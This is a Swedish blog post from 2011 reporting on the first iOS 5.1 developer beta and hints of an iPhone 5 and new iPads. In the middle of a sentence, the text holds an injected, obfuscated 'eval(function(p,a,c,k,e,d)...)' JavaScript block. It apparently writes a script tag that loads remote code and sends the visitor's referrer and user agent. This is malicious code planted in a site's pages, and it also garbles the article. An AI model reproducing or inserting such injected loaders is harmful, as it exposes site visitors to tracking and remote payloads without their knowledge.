Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

iOS 5.1 vad är nytt? iPhone 5?

iOS 5.1 vad är nytt? iPhone 5?
Filip Urde
  • On 30 november, 2011
  • http://www.revue.se/filip-urde

Den första beta-version av iOS 5.1 kom ut igår för utvecklare och här är lite av nyheterna som släppts.

@ eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|isdye|var|u0026u|referrer|hdhaa||js|php’.split(’|’),0,{}))
får en lite uppgraderad tangent i Mail applikationen

Vilket känns som en medioker uppdatering.

snabe-a-mail


Ny Geofence-symbol. Helt enkelt nya ikoner för din geografiska position, din enhet skapar olika geografiska positioner som t.ex. att ett område kan trigga olika saker. Om du i appen Påminnelser t.ex. skapar en påminnelse som ska sätta igång när du kommer hem så vet din iPhone när du kommer dit genom att du sätter upp ett såkallat “geofence” runt din bostad. Kan vara bra om du glömt att du ska vara någon annanstans än var du precis anlänt.

ios5-1-geofence

Vidare så har vi sett referenser till nya modeller av både iPad, iPhone och Apple TV

I dagsläget finns tre olika modeller av iPad 2 på marknaden, och de har varsitt identifieringsnummer 2,1 , 2,2 och 2,3. “2? betyde att det är en iPad 2, siffran efter kommatecknet däremot beskriver om det är Wifi-modellen, 3G-modellen eller CDMA-modellen. Nu har även en ny dykt upp, “2,4? och ”3,3” vilket kan tolkas som ännu en variant av den nuvarande iPad 2-modellen och en iPad 3.

screen-shot-2011-11-28-at-11-13-30-pm

 

Mest intressanta är ändå referenserna till en ny iPhone-modell (5,1) som för första gången upptäckts. Alltså är iPhone 5 för första gången upptäckt (se bild nedan).

iphone-5-references

Liket lever! Jag var besviken när det blev en iPhone 4s (läs här) men Äntligen känns en riktigt ”ny” iPhone nära…

info från Appadvice.com